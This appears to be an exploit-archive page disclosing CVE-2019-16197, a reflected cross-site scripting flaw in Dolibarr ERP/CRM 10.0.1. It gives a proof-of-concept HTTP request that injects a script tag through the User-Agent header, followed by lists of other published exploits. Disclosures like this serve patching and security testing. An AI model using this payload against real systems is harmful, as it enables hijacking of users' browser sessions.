"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2019-09-13

 Download file
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================

Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.

GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

Release Date	Title	Type	Platform	Author
2020-08-05	"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)"	dos	windows	MegaMagnus
2020-08-05	"Stock Management System 1.0 - Authentication Bypass"	webapps	php	"Adeeb Shah"
2020-08-05	"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-08-04	"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-08-04	"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)"	webapps	python	"Luis Vacacas"
2020-08-04	"Daily Expenses Management System 1.0 - 'username' SQL Injection"	webapps	php	"Daniel Ortiz"
2020-08-04	"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-07-30	"Online Shopping Alphaware 1.0 - Authentication Bypass"	webapps	php	"Ahmed Abbas"
2020-07-29	"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"
2020-07-29	"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion"	webapps	hardware	0xmmnbassel

Release Date	Title	Type	Platform	Author
2020-08-05	"Stock Management System 1.0 - Authentication Bypass"	webapps	php	"Adeeb Shah"
2020-08-04	"Daily Expenses Management System 1.0 - 'username' SQL Injection"	webapps	php	"Daniel Ortiz"
2020-07-30	"Online Shopping Alphaware 1.0 - Authentication Bypass"	webapps	php	"Ahmed Abbas"
2020-07-29	"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"
2020-07-27	"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution"	webapps	php	"Berk KIRAS"
2020-07-26	"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download"	webapps	php	KBA@SOGETI_ESEC
2020-07-26	"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)"	webapps	php	KBA@SOGETI_ESEC
2020-07-26	"elaniin CMS - Authentication Bypass"	webapps	php	BKpatron
2020-07-26	"GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)"	webapps	php	Balzabu
2020-07-26	"LibreHealth 2.0.0 - Authenticated Remote Code Execution"	webapps	php	boku

Release Date	Title	Type	Platform	Author
2020-07-15	"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	"Metin Yunus Kandemir"
2020-07-08	"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	"Metin Yunus Kandemir"
2020-04-21	"CSZ CMS 1.2.7 - 'title' HTML Injection"	webapps	php	"Metin Yunus Kandemir"
2020-04-21	"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2020-03-20	"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"	webapps	php	"Metin Yunus Kandemir"
2020-01-07	"Complaint Management System 4.0 - Remote Code Execution"	webapps	php	"Metin Yunus Kandemir"
2020-01-03	"Online Course Registration 2.0 - Remote Code Execution"	webapps	php	"Metin Yunus Kandemir"
2020-01-01	"Shopping Portal ProVersion 3.0 - Authentication Bypass"	webapps	php	"Metin Yunus Kandemir"
2020-01-01	"Hospital Management System 4.0 - Authentication Bypass"	webapps	php	"Metin Yunus Kandemir"
2019-12-09	"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-09-13	"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-09-09	"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-09-09	"Dolibarr ERP-CRM 10.0.1 - SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-08-01	"Ultimate Loan Manager 2.0 - Cross-Site Scripting"	webapps	multiple	"Metin Yunus Kandemir"
2019-07-12	"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting"	webapps	php	"Metin Yunus Kandemir"
2019-06-24	"dotProject 2.1.9 - SQL Injection"	webapps	php	"Metin Yunus Kandemir"
2019-05-29	"Free SMTP Server 2.5 - Denial of Service (PoC)"	dos	windows	"Metin Yunus Kandemir"
2019-04-03	"PhreeBooks ERP 5.2.3 - Remote Command Execution"	remote	python	"Metin Yunus Kandemir"

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/47384/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.